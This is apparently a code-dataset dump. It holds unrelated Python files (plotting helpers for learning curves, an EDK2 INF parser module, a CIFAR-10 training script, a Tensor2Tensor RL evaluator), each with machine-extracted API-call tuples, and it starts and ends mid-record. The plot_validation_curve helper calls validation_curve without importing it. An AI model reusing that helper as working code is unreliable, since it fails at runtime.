] | [((861, 893), 're.compile', 're.compile', (['"""^[-a-zA-Z0-9_]+\\\\Z"""'], {}), "('^[-a-zA-Z0-9_]+\\\\Z')\n", (871, 893), False, 'import re\n'), ((1696, 1728), 're.compile', 're.compile', (['"""^[-a-zA-Z0-9_]+\\\\Z"""'], {}), "('^[-a-zA-Z0-9_]+\\\\Z')\n", (1706, 1728), False, 'import re\n')] |
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn.model_selection import learning_curve
# Plot learning curve
def plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,
n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):
plt.figure()
plt.title(title)
if ylim is not None:
plt.ylim(*ylim)
plt.xlabel("Training examples")
plt.ylabel("Score")
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
test_scores_mean = np.mean(test_scores, axis=1)
test_scores_std = np.std(test_scores, axis=1)
plt.grid(True)
plt.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1,
color="r")
plt.fill_between(train_sizes, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.1, color="g")
plt.plot(train_sizes, train_scores_mean, 'o-', color="r",
label="Training score")
plt.plot(train_sizes, test_scores_mean, 'o-', color="g",
label="Validation score")
plt.legend(loc="best")
plt.show()
return plt
# Plot validation curve
def plot_validation_curve(estimator, title, X, y, param_name, param_range, ylim=None, cv=None,
n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):
train_scores, test_scores = validation_curve(estimator, X, y, param_name, param_range, cv)
train_mean = np.mean(train_scores, axis=1)
train_std = np.std(train_scores, axis=1)
test_mean = np.mean(test_scores, axis=1)
test_std = np.std(test_scores, axis=1)
plt.plot(param_range, train_mean, color='r', marker='o', markersize=5, label='Training score')
plt.fill_between(param_range, train_mean + train_std, train_mean - train_std, alpha=0.15, color='r')
plt.plot(param_range, test_mean, color='g', linestyle='--', marker='s', markersize=5, label='Validation score')
plt.fill_between(param_range, test_mean + test_std, test_mean - test_std, alpha=0.15, color='g')
plt.grid(True)
plt.xscale('log')
plt.legend(loc='best')
plt.xlabel('Parameter')
plt.ylabel('Score')
plt.ylim(ylim)
| [
"numpy.mean",
"matplotlib.pyplot.grid",
"sklearn.model_selection.learning_curve",
"matplotlib.pyplot.xscale",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.fill_between",
"numpy.linspace",
"matplotlib.pyplot.figure",
"numpy.std",
"matplotlib.pyplot.title",
"matplotlib.pyplot.ylim",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.show"
] | [((282, 306), 'numpy.linspace', 'np.linspace', (['(0.1)', '(1.0)', '(5)'], {}), '(0.1, 1.0, 5)\n', (293, 306), True, 'import numpy as np\n'), ((312, 324), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (322, 324), True, 'import matplotlib.pyplot as plt\n'), ((329, 345), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (338, 345), True, 'import matplotlib.pyplot as plt\n'), ((399, 430), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Training examples"""'], {}), "('Training examples')\n", (409, 430), True, 'import matplotlib.pyplot as plt\n'), ((435, 454), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Score"""'], {}), "('Score')\n", (445, 454), True, 'import matplotlib.pyplot as plt\n'), ((500, 578), 'sklearn.model_selection.learning_curve', 'learning_curve', (['estimator', 'X', 'y'], {'cv': 'cv', 'n_jobs': 'n_jobs', 'train_sizes': 'train_sizes'}), '(estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)\n', (514, 578), False, 'from sklearn.model_selection import learning_curve\n'), ((612, 641), 'numpy.mean', 'np.mean', (['train_scores'], {'axis': '(1)'}), '(train_scores, axis=1)\n', (619, 641), True, 'import numpy as np\n'), ((665, 693), 'numpy.std', 'np.std', (['train_scores'], {'axis': '(1)'}), '(train_scores, axis=1)\n', (671, 693), True, 'import numpy as np\n'), ((717, 745), 'numpy.mean', 'np.mean', (['test_scores'], {'axis': '(1)'}), '(test_scores, axis=1)\n', (724, 745), True, 'import numpy as np\n'), ((768, 795), 'numpy.std', 'np.std', (['test_scores'], {'axis': '(1)'}), '(test_scores, axis=1)\n', (774, 795), True, 'import numpy as np\n'), ((800, 814), 'matplotlib.pyplot.grid', 'plt.grid', (['(True)'], {}), '(True)\n', (808, 814), True, 'import matplotlib.pyplot as plt\n'), ((820, 952), 'matplotlib.pyplot.fill_between', 'plt.fill_between', (['train_sizes', '(train_scores_mean - train_scores_std)', '(train_scores_mean + train_scores_std)'], {'alpha': '(0.1)', 'color': '"""r"""'}), "(train_sizes, train_scores_mean - train_scores_std, \n train_scores_mean + train_scores_std, alpha=0.1, color='r')\n", (836, 952), True, 'import matplotlib.pyplot as plt\n'), ((994, 1122), 'matplotlib.pyplot.fill_between', 'plt.fill_between', (['train_sizes', '(test_scores_mean - test_scores_std)', '(test_scores_mean + test_scores_std)'], {'alpha': '(0.1)', 'color': '"""g"""'}), "(train_sizes, test_scores_mean - test_scores_std, \n test_scores_mean + test_scores_std, alpha=0.1, color='g')\n", (1010, 1122), True, 'import matplotlib.pyplot as plt\n'), ((1143, 1229), 'matplotlib.pyplot.plot', 'plt.plot', (['train_sizes', 'train_scores_mean', '"""o-"""'], {'color': '"""r"""', 'label': '"""Training score"""'}), "(train_sizes, train_scores_mean, 'o-', color='r', label=\n 'Training score')\n", (1151, 1229), True, 'import matplotlib.pyplot as plt\n'), ((1242, 1329), 'matplotlib.pyplot.plot', 'plt.plot', (['train_sizes', 'test_scores_mean', '"""o-"""'], {'color': '"""g"""', 'label': '"""Validation score"""'}), "(train_sizes, test_scores_mean, 'o-', color='g', label=\n 'Validation score')\n", (1250, 1329), True, 'import matplotlib.pyplot as plt\n'), ((1343, 1365), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""best"""'}), "(loc='best')\n", (1353, 1365), True, 'import matplotlib.pyplot as plt\n'), ((1370, 1380), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1378, 1380), True, 'import matplotlib.pyplot as plt\n'), ((1562, 1586), 'numpy.linspace', 'np.linspace', (['(0.1)', '(1.0)', '(5)'], {}), '(0.1, 1.0, 5)\n', (1573, 1586), True, 'import numpy as np\n'), ((1700, 1729), 'numpy.mean', 'np.mean', (['train_scores'], {'axis': '(1)'}), '(train_scores, axis=1)\n', (1707, 1729), True, 'import numpy as np\n'), ((1746, 1774), 'numpy.std', 'np.std', (['train_scores'], {'axis': '(1)'}), '(train_scores, axis=1)\n', (1752, 1774), True, 'import numpy as np\n'), ((1791, 1819), 'numpy.mean', 'np.mean', (['test_scores'], {'axis': '(1)'}), '(test_scores, axis=1)\n', (1798, 1819), True, 'import numpy as np\n'), ((1835, 1862), 'numpy.std', 'np.std', (['test_scores'], {'axis': '(1)'}), '(test_scores, axis=1)\n', (1841, 1862), True, 'import numpy as np\n'), ((1867, 1965), 'matplotlib.pyplot.plot', 'plt.plot', (['param_range', 'train_mean'], {'color': '"""r"""', 'marker': '"""o"""', 'markersize': '(5)', 'label': '"""Training score"""'}), "(param_range, train_mean, color='r', marker='o', markersize=5,\n label='Training score')\n", (1875, 1965), True, 'import matplotlib.pyplot as plt\n'), ((1966, 2070), 'matplotlib.pyplot.fill_between', 'plt.fill_between', (['param_range', '(train_mean + train_std)', '(train_mean - train_std)'], {'alpha': '(0.15)', 'color': '"""r"""'}), "(param_range, train_mean + train_std, train_mean -\n train_std, alpha=0.15, color='r')\n", (1982, 2070), True, 'import matplotlib.pyplot as plt\n'), ((2071, 2186), 'matplotlib.pyplot.plot', 'plt.plot', (['param_range', 'test_mean'], {'color': '"""g"""', 'linestyle': '"""--"""', 'marker': '"""s"""', 'markersize': '(5)', 'label': '"""Validation score"""'}), "(param_range, test_mean, color='g', linestyle='--', marker='s',\n markersize=5, label='Validation score')\n", (2079, 2186), True, 'import matplotlib.pyplot as plt\n'), ((2187, 2287), 'matplotlib.pyplot.fill_between', 'plt.fill_between', (['param_range', '(test_mean + test_std)', '(test_mean - test_std)'], {'alpha': '(0.15)', 'color': '"""g"""'}), "(param_range, test_mean + test_std, test_mean - test_std,\n alpha=0.15, color='g')\n", (2203, 2287), True, 'import matplotlib.pyplot as plt\n'), ((2288, 2302), 'matplotlib.pyplot.grid', 'plt.grid', (['(True)'], {}), '(True)\n', (2296, 2302), True, 'import matplotlib.pyplot as plt\n'), ((2308, 2325), 'matplotlib.pyplot.xscale', 'plt.xscale', (['"""log"""'], {}), "('log')\n", (2318, 2325), True, 'import matplotlib.pyplot as plt\n'), ((2330, 2352), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""best"""'}), "(loc='best')\n", (2340, 2352), True, 'import matplotlib.pyplot as plt\n'), ((2358, 2381), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Parameter"""'], {}), "('Parameter')\n", (2368, 2381), True, 'import matplotlib.pyplot as plt\n'), ((2387, 2406), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Score"""'], {}), "('Score')\n", (2397, 2406), True, 'import matplotlib.pyplot as plt\n'), ((2412, 2426), 'matplotlib.pyplot.ylim', 'plt.ylim', (['ylim'], {}), '(ylim)\n', (2420, 2426), True, 'import matplotlib.pyplot as plt\n'), ((379, 394), 'matplotlib.pyplot.ylim', 'plt.ylim', (['*ylim'], {}), '(*ylim)\n', (387, 394), True, 'import matplotlib.pyplot as plt\n')] |
## @file
# This file is used to define class objects of INF file miscellaneous.
# Include BootMode/HOB/Event and others. It will consumed by InfParser.
#
# Copyright (c) 2011 - 2018, Intel Corporation. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
'''
InfMisc
'''
import Logger.Log as Logger
from Logger import ToolError
from Library import DataType as DT
from Object.Parser.InfCommonObject import InfSectionCommonDef
from Library.Misc import Sdict
##
# BootModeObject
#
class InfBootModeObject():
def __init__(self):
self.SupportedBootModes = ''
self.HelpString = ''
self.Usage = ''
def SetSupportedBootModes(self, SupportedBootModes):
self.SupportedBootModes = SupportedBootModes
def GetSupportedBootModes(self):
return self.SupportedBootModes
def SetHelpString(self, HelpString):
self.HelpString = HelpString
def GetHelpString(self):
return self.HelpString
def SetUsage(self, Usage):
self.Usage = Usage
def GetUsage(self):
return self.Usage
##
# EventObject
#
class InfEventObject():
def __init__(self):
self.EventType = ''
self.HelpString = ''
self.Usage = ''
def SetEventType(self, EventType):
self.EventType = EventType
def GetEventType(self):
return self.EventType
def SetHelpString(self, HelpString):
self.HelpString = HelpString
def GetHelpString(self):
return self.HelpString
def SetUsage(self, Usage):
self.Usage = Usage
def GetUsage(self):
return self.Usage
##
# HobObject
#
class InfHobObject():
def __init__(self):
self.HobType = ''
self.Usage = ''
self.SupArchList = []
self.HelpString = ''
def SetHobType(self, HobType):
self.HobType = HobType
def GetHobType(self):
return self.HobType
def SetUsage(self, Usage):
self.Usage = Usage
def GetUsage(self):
return self.Usage
def SetSupArchList(self, ArchList):
self.SupArchList = ArchList
def GetSupArchList(self):
return self.SupArchList
def SetHelpString(self, HelpString):
self.HelpString = HelpString
def GetHelpString(self):
return self.HelpString
##
# InfSpecialCommentObject
#
class InfSpecialCommentObject(InfSectionCommonDef):
def __init__(self):
self.SpecialComments = Sdict()
InfSectionCommonDef.__init__(self)
def SetSpecialComments(self, SepcialSectionList = None, Type = ''):
if Type == DT.TYPE_HOB_SECTION or \
Type == DT.TYPE_EVENT_SECTION or \
Type == DT.TYPE_BOOTMODE_SECTION:
for Item in SepcialSectionList:
if Type in self.SpecialComments:
ObjList = self.SpecialComments[Type]
ObjList.append(Item)
self.SpecialComments[Type] = ObjList
else:
ObjList = []
ObjList.append(Item)
self.SpecialComments[Type] = ObjList
return True
def GetSpecialComments(self):
return self.SpecialComments
## ErrorInInf
#
# An encapsulate of Error for INF parser.
#
def ErrorInInf(Message=None, ErrorCode=None, LineInfo=None, RaiseError=True):
if ErrorCode is None:
ErrorCode = ToolError.FORMAT_INVALID
if LineInfo is None:
LineInfo = ['', -1, '']
Logger.Error("InfParser",
ErrorCode,
Message=Message,
File=LineInfo[0],
Line=LineInfo[1],
ExtraData=LineInfo[2],
RaiseError=RaiseError)
| [
"Logger.Log.Error",
"Object.Parser.InfCommonObject.InfSectionCommonDef.__init__",
"Library.Misc.Sdict"
] | [((3454, 3593), 'Logger.Log.Error', 'Logger.Error', (['"""InfParser"""', 'ErrorCode'], {'Message': 'Message', 'File': 'LineInfo[0]', 'Line': 'LineInfo[1]', 'ExtraData': 'LineInfo[2]', 'RaiseError': 'RaiseError'}), "('InfParser', ErrorCode, Message=Message, File=LineInfo[0],\n Line=LineInfo[1], ExtraData=LineInfo[2], RaiseError=RaiseError)\n", (3466, 3593), True, 'import Logger.Log as Logger\n'), ((2429, 2436), 'Library.Misc.Sdict', 'Sdict', ([], {}), '()\n', (2434, 2436), False, 'from Library.Misc import Sdict\n'), ((2445, 2479), 'Object.Parser.InfCommonObject.InfSectionCommonDef.__init__', 'InfSectionCommonDef.__init__', (['self'], {}), '(self)\n', (2473, 2479), False, 'from Object.Parser.InfCommonObject import InfSectionCommonDef\n')] |
import torch
import torchvision
import torchvision.transforms as transforms
import os.path
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
transform = transforms.Compose(
[transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
root = os.path.join(BASE_DIR, '../data/')
trainset = torchvision.datasets.CIFAR10(root=root, train=True,
download=True, transform=transform)
trainloader = torch.utils.data.DataLoader(trainset,
shuffle=True, num_workers=2)
testset = torchvision.datasets.CIFAR10(root=root, train=False,
download=True, transform=transform)
testloader = torch.utils.data.DataLoader(testset,
shuffle=False, num_workers=2)
import torch.nn as nn
import torch.nn.functional as F
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
# print(x.shape)
x = self.pool(F.relu(self.conv1(x)))
# print(x.shape)
x = self.pool(F.relu(self.conv2(x)))
# print(x.shape)
x = x.view(-1, 16 * 5 * 5)
# print(x.shape)
x = F.relu(self.fc1(x))
# print(x.shape)
x = F.relu(self.fc2(x))
# print(x.shape)
x = self.fc3(x)
# print(x.shape)
return x
# torch.Size([1, 3, 32, 32])
# torch.Size([1, 6, 14, 14])
# torch.Size([1, 16, 5, 5])
# torch.Size([1, 400])
# torch.Size([1, 120])
# torch.Size([1, 84])
# torch.Size([1, 100])
model = Net()
import torch.optim as optim
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(model.parameters(), lr=0.0002, momentum=0.9)
from util import train_eval
train_eval(model, criterion, trainloader, testloader, optimizer, epochs=5)
# [1, 5000] loss: 2.293
# [1, 10000] loss: 2.075
# [1, 15000] loss: 1.876
# [1, 20000] loss: 1.754
# [1, 25000] loss: 1.658
# [1, 30000] loss: 1.625
# [1, 35000] loss: 1.558
# [1, 40000] loss: 1.520
# [1, 45000] loss: 1.494
# [1, 50000] loss: 1.459
# 1/5 4456/10000 44.56% (107.18255376815796s)
# [2, 5000] loss: 1.413
# [2, 10000] loss: 1.398
# [2, 15000] loss: 1.386
# [2, 20000] loss: 1.379
# [2, 25000] loss: 1.358
# [2, 30000] loss: 1.324
# [2, 35000] loss: 1.333
# [2, 40000] loss: 1.280
# [2, 45000] loss: 1.296
# [2, 50000] loss: 1.304
# 2/5 5357/10000 53.56999999999999% (105.8866639137268s)
# [3, 5000] loss: 1.226
# [3, 10000] loss: 1.231
# [3, 15000] loss: 1.215
# [3, 20000] loss: 1.235
# [3, 25000] loss: 1.199
# [3, 30000] loss: 1.187
# [3, 35000] loss: 1.192
# [3, 40000] loss: 1.194
# [3, 45000] loss: 1.196
# [3, 50000] loss: 1.191
# 3/5 5729/10000 57.29% (105.63971090316772s)
# [4, 5000] loss: 1.117
# [4, 10000] loss: 1.096
# [4, 15000] loss: 1.121
# [4, 20000] loss: 1.123
# [4, 25000] loss: 1.107
# [4, 30000] loss: 1.120
# [4, 35000] loss: 1.124
# [4, 40000] loss: 1.094
# [4, 45000] loss: 1.105
# [4, 50000] loss: 1.102
# 4/5 5829/10000 58.29% (112.56915497779846s)
# [5, 5000] loss: 1.034
# [5, 10000] loss: 1.024
# [5, 15000] loss: 1.040
# [5, 20000] loss: 1.027
# [5, 25000] loss: 1.043
# [5, 30000] loss: 1.049
# [5, 35000] loss: 1.024
# [5, 40000] loss: 1.042
# [5, 45000] loss: 1.027
# [5, 50000] loss: 1.027
# 5/5 6178/10000 61.78% (109.75669193267822s)
# 61.0% (541.0347754955292s)
| [
"torch.nn.CrossEntropyLoss",
"util.train_eval",
"torch.nn.Conv2d",
"torchvision.datasets.CIFAR10",
"torch.nn.MaxPool2d",
"torchvision.transforms.Normalize",
"torch.utils.data.DataLoader",
"torch.nn.Linear",
"torchvision.transforms.ToTensor"
] | [((322, 413), 'torchvision.datasets.CIFAR10', 'torchvision.datasets.CIFAR10', ([], {'root': 'root', 'train': '(True)', 'download': '(True)', 'transform': 'transform'}), '(root=root, train=True, download=True,\n transform=transform)\n', (350, 413), False, 'import torchvision\n'), ((464, 530), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['trainset'], {'shuffle': '(True)', 'num_workers': '(2)'}), '(trainset, shuffle=True, num_workers=2)\n', (491, 530), False, 'import torch\n'), ((584, 676), 'torchvision.datasets.CIFAR10', 'torchvision.datasets.CIFAR10', ([], {'root': 'root', 'train': '(False)', 'download': '(True)', 'transform': 'transform'}), '(root=root, train=False, download=True,\n transform=transform)\n', (612, 676), False, 'import torchvision\n'), ((725, 791), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['testset'], {'shuffle': '(False)', 'num_workers': '(2)'}), '(testset, shuffle=False, num_workers=2)\n', (752, 791), False, 'import torch\n'), ((1879, 1900), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {}), '()\n', (1898, 1900), True, 'import torch.nn as nn\n'), ((1999, 2073), 'util.train_eval', 'train_eval', (['model', 'criterion', 'trainloader', 'testloader', 'optimizer'], {'epochs': '(5)'}), '(model, criterion, trainloader, testloader, optimizer, epochs=5)\n', (2009, 2073), False, 'from util import train_eval\n'), ((183, 204), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (202, 204), True, 'import torchvision.transforms as transforms\n'), ((211, 265), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['(0.5, 0.5, 0.5)', '(0.5, 0.5, 0.5)'], {}), '((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n', (231, 265), True, 'import torchvision.transforms as transforms\n'), ((993, 1011), 'torch.nn.Conv2d', 'nn.Conv2d', (['(3)', '(6)', '(5)'], {}), '(3, 6, 5)\n', (1002, 1011), True, 'import torch.nn as nn\n'), ((1032, 1050), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (['(2)', '(2)'], {}), '(2, 2)\n', (1044, 1050), True, 'import torch.nn as nn\n'), ((1072, 1091), 'torch.nn.Conv2d', 'nn.Conv2d', (['(6)', '(16)', '(5)'], {}), '(6, 16, 5)\n', (1081, 1091), True, 'import torch.nn as nn\n'), ((1111, 1137), 'torch.nn.Linear', 'nn.Linear', (['(16 * 5 * 5)', '(120)'], {}), '(16 * 5 * 5, 120)\n', (1120, 1137), True, 'import torch.nn as nn\n'), ((1157, 1175), 'torch.nn.Linear', 'nn.Linear', (['(120)', '(84)'], {}), '(120, 84)\n', (1166, 1175), True, 'import torch.nn as nn\n'), ((1195, 1212), 'torch.nn.Linear', 'nn.Linear', (['(84)', '(10)'], {}), '(84, 10)\n', (1204, 1212), True, 'import torch.nn as nn\n')] |
# coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Evaluation script for RL agents.
Example invocation:
python -m tensor2tensor.rl.evaluator \
--policy_dir=$HOME/t2t/rl_v1/policy \
--eval_metrics_dir=$HOME/t2t/rl_v1/full_eval_metrics \
--hparams_set=rlmb_base \
--hparams='batch_size=64'
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import os
from tensor2tensor.data_generators import gym_env
from tensor2tensor.layers import common_video
from tensor2tensor.models.research import rl # pylint: disable=unused-import
from tensor2tensor.rl import rl_utils
from tensor2tensor.rl import trainer_model_based_params # pylint: disable=unused-import
from tensor2tensor.utils import flags as t2t_flags # pylint: disable=unused-import
from tensor2tensor.utils import registry
from tensor2tensor.utils import trainer_lib
import tensorflow as tf
flags = tf.flags
FLAGS = flags.FLAGS
flags.DEFINE_string("output_dir", "", "Main directory for multi-runs.")
flags.DEFINE_integer("total_num_workers", 1, "How many workers in total.")
flags.DEFINE_string("worker_to_game_map", "", "How to map workers to games.")
flags.DEFINE_string("policy_dir", "", "Directory with policy checkpoints.")
flags.DEFINE_string("model_dir", "", "Directory with model checkpoints.")
flags.DEFINE_string(
"eval_metrics_dir", "", "Directory to output the eval metrics at."
)
flags.DEFINE_bool("full_eval", True, "Whether to ignore the timestep limit.")
flags.DEFINE_enum(
"agent", "policy", ["random", "policy", "planner"], "Agent type to use."
)
flags.DEFINE_bool(
"eval_with_learner", True,
"Whether to use the PolicyLearner.evaluate function instead of an "
"out-of-graph one. Works only with --agent=policy."
)
flags.DEFINE_string(
"planner_hparams_set", "planner_small", "Planner hparam set."
)
flags.DEFINE_string("planner_hparams", "", "Planner hparam overrides.")
flags.DEFINE_integer(
"log_every_steps", 20, "Log every how many environment steps."
)
flags.DEFINE_string(
"debug_video_path", "", "Path to save the planner debug video at."
)
# Unused flags needed to pass for multi-run infrastructure.
flags.DEFINE_bool("autotune", False, "Unused here.")
flags.DEFINE_string("objective", "", "Unused here.")
flags.DEFINE_string("client_handle", "client_0", "Unused.")
flags.DEFINE_bool("maximize_tuner_objective", True, "Unused.")
flags.DEFINE_integer("vizier_search_algorithm", 0, "Unused.")
@registry.register_hparams
def planner_tiny():
return tf.contrib.training.HParams(
num_rollouts=1,
planning_horizon=2,
rollout_agent_type="random",
batch_size=1,
env_type="simulated",
)
@registry.register_hparams
def planner_small():
return tf.contrib.training.HParams(
num_rollouts=64,
planning_horizon=16,
rollout_agent_type="policy",
batch_size=64,
env_type="simulated",
)
def make_env(env_type, real_env, sim_env_kwargs):
"""Factory function for envs."""
return {
"real": lambda: real_env.new_like( # pylint: disable=g-long-lambda
batch_size=sim_env_kwargs["batch_size"],
store_rollouts=False,
),
"simulated": lambda: rl_utils.SimulatedBatchGymEnvWithFixedInitialFrames( # pylint: disable=g-long-lambda
**sim_env_kwargs
),
}[env_type]()
def make_agent(
agent_type, env, policy_hparams, policy_dir, sampling_temp,
sim_env_kwargs=None, frame_stack_size=None, planning_horizon=None,
rollout_agent_type=None, batch_size=None, num_rollouts=None,
inner_batch_size=None, video_writer=None, env_type=None):
"""Factory function for Agents."""
if batch_size is None:
batch_size = env.batch_size
return {
"random": lambda: rl_utils.RandomAgent( # pylint: disable=g-long-lambda
batch_size, env.observation_space, env.action_space
),
"policy": lambda: rl_utils.PolicyAgent( # pylint: disable=g-long-lambda
batch_size, env.observation_space, env.action_space,
policy_hparams, policy_dir, sampling_temp
),
"planner": lambda: rl_utils.PlannerAgent( # pylint: disable=g-long-lambda
batch_size, make_agent(
rollout_agent_type, env, policy_hparams, policy_dir,
sampling_temp, batch_size=inner_batch_size
), make_env(env_type, env.env, sim_env_kwargs),
lambda env: rl_utils.BatchStackWrapper(env, frame_stack_size),
num_rollouts, planning_horizon,
discount_factor=policy_hparams.gae_gamma, video_writer=video_writer
),
}[agent_type]()
def make_eval_fn_with_agent(
agent_type, planner_hparams, model_dir, log_every_steps=None,
video_writer=None
):
"""Returns an out-of-graph eval_fn using the Agent API."""
def eval_fn(env, loop_hparams, policy_hparams, policy_dir, sampling_temp):
"""Eval function."""
base_env = env
env = rl_utils.BatchStackWrapper(env, loop_hparams.frame_stack_size)
sim_env_kwargs = rl.make_simulated_env_kwargs(
base_env, loop_hparams, batch_size=planner_hparams.batch_size,
model_dir=model_dir
)
agent = make_agent(
agent_type, env, policy_hparams, policy_dir, sampling_temp,
sim_env_kwargs, loop_hparams.frame_stack_size,
planner_hparams.planning_horizon, planner_hparams.rollout_agent_type,
num_rollouts=planner_hparams.num_rollouts,
inner_batch_size=planner_hparams.batch_size, video_writer=video_writer,
env_type=planner_hparams.env_type
)
rl_utils.run_rollouts(
env, agent, env.reset(), log_every_steps=log_every_steps
)
assert len(base_env.current_epoch_rollouts()) == env.batch_size
return eval_fn
def evaluate(
loop_hparams, planner_hparams, policy_dir, model_dir, eval_metrics_dir,
agent_type, eval_with_learner, log_every_steps, debug_video_path,
report_fn=None, report_metric=None
):
"""Evaluate."""
if eval_with_learner:
assert agent_type == "policy"
if report_fn:
assert report_metric is not None
eval_metrics_writer = tf.summary.FileWriter(eval_metrics_dir)
video_writer = None
kwargs = {}
if not eval_with_learner:
if debug_video_path:
video_writer = common_video.WholeVideoWriter(
fps=10, output_path=debug_video_path, file_format="avi")
kwargs["eval_fn"] = make_eval_fn_with_agent(
agent_type, planner_hparams, model_dir, log_every_steps=log_every_steps,
video_writer=video_writer
)
eval_metrics = rl_utils.evaluate_all_configs(
loop_hparams, policy_dir, **kwargs
)
rl_utils.summarize_metrics(eval_metrics_writer, eval_metrics, 0)
if video_writer is not None:
video_writer.finish_to_disk()
# Report metrics
if report_fn:
if report_metric == "mean_reward":
metric_name = rl_utils.get_metric_name(
sampling_temp=loop_hparams.eval_sampling_temps[0],
max_num_noops=loop_hparams.eval_max_num_noops,
clipped=False
)
report_fn(eval_metrics[metric_name], 0)
else:
report_fn(eval_metrics[report_metric], 0)
return eval_metrics
def get_game_for_worker(map_name, directory_id):
"""Get game for the given worker (directory) id."""
if map_name == "v100unfriendly":
games = ["chopper_command", "boxing", "asterix", "seaquest"]
worker_per_game = 5
elif map_name == "human_nice":
games = gym_env.ATARI_GAMES_WITH_HUMAN_SCORE_NICE
worker_per_game = 5
else:
raise ValueError("Unknown worker to game map name: %s" % map_name)
games.sort()
game_id = (directory_id - 1) // worker_per_game
tf.logging.info("Getting game %d from %s." % (game_id, games))
return games[game_id]
def main(_):
now = datetime.datetime.now()
now_tag = now.strftime("%Y_%m_%d_%H_%M")
loop_hparams = trainer_lib.create_hparams(
FLAGS.loop_hparams_set, FLAGS.loop_hparams
)
if FLAGS.worker_to_game_map and FLAGS.total_num_workers > 1:
loop_hparams.game = get_game_for_worker(
FLAGS.worker_to_game_map, FLAGS.worker_id + 1)
tf.logging.info("Set game to %s." % loop_hparams.game)
if FLAGS.full_eval:
loop_hparams.eval_rl_env_max_episode_steps = -1
planner_hparams = trainer_lib.create_hparams(
FLAGS.planner_hparams_set, FLAGS.planner_hparams
)
policy_dir = FLAGS.policy_dir
model_dir = FLAGS.model_dir
eval_metrics_dir = FLAGS.eval_metrics_dir
if FLAGS.output_dir:
cur_dir = FLAGS.output_dir
if FLAGS.total_num_workers > 1:
cur_dir = os.path.join(cur_dir, "%d" % (FLAGS.worker_id + 1))
policy_dir = os.path.join(cur_dir, "policy")
model_dir = os.path.join(cur_dir, "world_model")
eval_metrics_dir = os.path.join(cur_dir, "evaluator_" + now_tag)
tf.logging.info("Writing metrics to %s." % eval_metrics_dir)
if not tf.gfile.Exists(eval_metrics_dir):
tf.gfile.MkDir(eval_metrics_dir)
evaluate(
loop_hparams, planner_hparams, policy_dir, model_dir,
eval_metrics_dir, FLAGS.agent, FLAGS.eval_with_learner,
FLAGS.log_every_steps if FLAGS.log_every_steps > 0 else None,
debug_video_path=FLAGS.debug_video_path
)
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run()
| [
"tensorflow.gfile.MkDir",
"tensorflow.logging.set_verbosity",
"tensor2tensor.rl.rl_utils.get_metric_name",
"tensorflow.app.run",
"tensorflow.gfile.Exists",
"tensor2tensor.rl.rl_utils.RandomAgent",
"tensor2tensor.rl.rl_utils.PolicyAgent",
"tensor2tensor.rl.rl_utils.SimulatedBatchGymEnvWithFixedInitialFrames",
"tensor2tensor.rl.rl_utils.summarize_metrics",
"tensor2tensor.utils.trainer_lib.create_hparams",
"tensor2tensor.rl.rl_utils.evaluate_all_configs",
"tensor2tensor.rl.rl_utils.BatchStackWrapper",
"tensor2tensor.layers.common_video.WholeVideoWriter",
"tensorflow.summary.FileWriter",
"tensorflow.logging.info",
"os.path.join",
"datetime.datetime.now",
"tensorflow.contrib.training.HParams",
"tensor2tensor.models.research.rl.make_simulated_env_kwargs"
